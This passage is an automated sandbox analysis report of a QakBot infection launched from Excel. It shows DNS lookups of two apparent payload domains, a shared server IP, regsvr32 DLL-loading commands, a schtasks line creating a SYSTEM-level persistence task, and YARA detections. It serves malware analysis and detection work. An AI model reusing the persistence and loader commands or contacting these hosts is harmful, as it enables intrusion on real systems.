                                                                                                                                                              Jun 24, 2021 20:52:37.553111076 CEST6057953192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:37.608648062 CEST53605798.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:38.189977884 CEST5018353192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:38.244735956 CEST53501838.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:38.873672009 CEST6153153192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:38.931441069 CEST53615318.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:39.408198118 CEST4922853192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:39.466008902 CEST53492288.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:40.268268108 CEST5979453192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:40.323247910 CEST53597948.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:41.300545931 CEST5591653192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:41.358247042 CEST53559168.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:41.868838072 CEST5275253192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:41.924665928 CEST53527528.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:49.985790968 CEST6054253192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:50.041017056 CEST53605428.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:50.069133997 CEST6068953192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:50.133117914 CEST53606898.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:55.500143051 CEST6420653192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:55.564327002 CEST53642068.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:53:24.710867882 CEST5090453192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:53:24.774205923 CEST53509048.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:53:26.160170078 CEST5752553192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:53:26.217027903 CEST53575258.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:54:10.313337088 CEST5381453192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:54:10.390286922 CEST53538148.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:54:10.929649115 CEST5341853192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:54:10.976474047 CEST53534188.8.8.8192.168.2.4

                                                                                                                                                              DNS Queries

                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                              Jun 24, 2021 20:51:59.018085957 CEST192.168.2.48.8.8.80x2b13Standard query (0)carpascapital.comA (IP address)IN (0x0001)
                                                                                                                                                              Jun 24, 2021 20:52:00.620779991 CEST192.168.2.48.8.8.80xaad0Standard query (0)gruasphenbogota.comA (IP address)IN (0x0001)

                                                                                                                                                              DNS Answers

                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                              Jun 24, 2021 20:51:59.214350939 CEST8.8.8.8192.168.2.40x2b13No error (0)carpascapital.com50.116.92.246A (IP address)IN (0x0001)
                                                                                                                                                              Jun 24, 2021 20:52:00.675678015 CEST8.8.8.8192.168.2.40xaad0No error (0)gruasphenbogota.com50.116.92.246A (IP address)IN (0x0001)
                                                                                                                                                              Jun 24, 2021 20:54:10.390286922 CEST8.8.8.8192.168.2.40xe13aNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)

                                                                                                                                                              HTTPS Packets

                                                                                                                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                              Jun 24, 2021 20:51:59.543297052 CEST50.116.92.246443192.168.2.449739CN=*.carpascapital.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri May 21 05:30:14 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Thu Aug 19 05:30:14 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                              CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                                                                                                                                                              CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024
                                                                                                                                                              Jun 24, 2021 20:52:00.996279955 CEST50.116.92.246443192.168.2.449742CN=gruasphenbogota.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon May 10 05:47:53 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Sun Aug 08 05:47:53 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                              CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                                                                                                                                                              CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024

                                                                                                                                                              Code Manipulations

                                                                                                                                                              Statistics

                                                                                                                                                              Behavior

                                                                                                                                                              Click to jump to process

                                                                                                                                                              System Behavior

                                                                                                                                                              General

                                                                                                                                                              Start time:20:51:53
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                              Imagebase:0xc70000
                                                                                                                                                              File size:27110184 bytes
                                                                                                                                                              MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:52:01
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:regsvr32 ..\gihi1.dll
                                                                                                                                                              Imagebase:0x13b0000
                                                                                                                                                              File size:20992 bytes
                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000002.700614054.0000000001120000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: QakBot, Description: QakBot Payload, Source: 00000003.00000002.700614054.0000000001120000.00000004.00000001.sdmp, Author: kevoreilly
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:52:10
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Imagebase:0x12b0000
                                                                                                                                                              File size:3611360 bytes
                                                                                                                                                              MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: QakBot, Description: QakBot Payload, Source: 00000004.00000002.973589332.0000000001100000.00000040.00000001.sdmp, Author: kevoreilly
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:52:11
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:regsvr32 ..\gihi2.dll
                                                                                                                                                              Imagebase:0x13b0000
                                                                                                                                                              File size:20992 bytes
                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000006.00000002.711643542.0000000000F30000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: QakBot, Description: QakBot Payload, Source: 00000006.00000002.711643542.0000000000F30000.00000004.00000001.sdmp, Author: kevoreilly
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:52:12
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wtdsqwcv /tr 'regsvr32.exe -s \'C:\Users\user\gihi1.dll\'' /SC ONCE /Z /ST 20:54 /ET 21:06
                                                                                                                                                              Imagebase:0x1390000
                                                                                                                                                              File size:185856 bytes
                                                                                                                                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:52:12
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff724c50000
                                                                                                                                                              File size:625664 bytes
                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:52:13
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:regsvr32.exe -s 'C:\Users\user\gihi1.dll'
                                                                                                                                                              Imagebase:0x7ff65e5f0000
                                                                                                                                                              File size:24064 bytes
                                                                                                                                                              MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:52:13
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline: -s 'C:\Users\user\gihi1.dll'
                                                                                                                                                              Imagebase:0x13b0000
                                                                                                                                                              File size:20992 bytes
                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:52:15
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Imagebase:0x12b0000
                                                                                                                                                              File size:3611360 bytes
                                                                                                                                                              MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: QakBot, Description: QakBot Payload, Source: 0000000D.00000002.713096999.0000000000660000.00000040.00000001.sdmp, Author: kevoreilly
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:52:16
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7092 -s 652
                                                                                                                                                              Imagebase:0xa60000
                                                                                                                                                              File size:434592 bytes
                                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:54:00
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:regsvr32.exe -s 'C:\Users\user\gihi1.dll'
                                                                                                                                                              Imagebase:0x7ff65e5f0000
                                                                                                                                                              File size:24064 bytes
                                                                                                                                                              MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:54:00
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline: -s 'C:\Users\user\gihi1.dll'
                                                                                                                                                              Imagebase:0x13b0000
                                                                                                                                                              File size:20992 bytes
                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                              General

                                                                                                                                                              Start time:20:54:02
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 652
                                                                                                                                                              Imagebase:0xa60000
                                                                                                                                                              File size:434592 bytes
                                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                              Disassembly

                                                                                                                                                              Code Analysis

                                                                                                                                                              Reset < >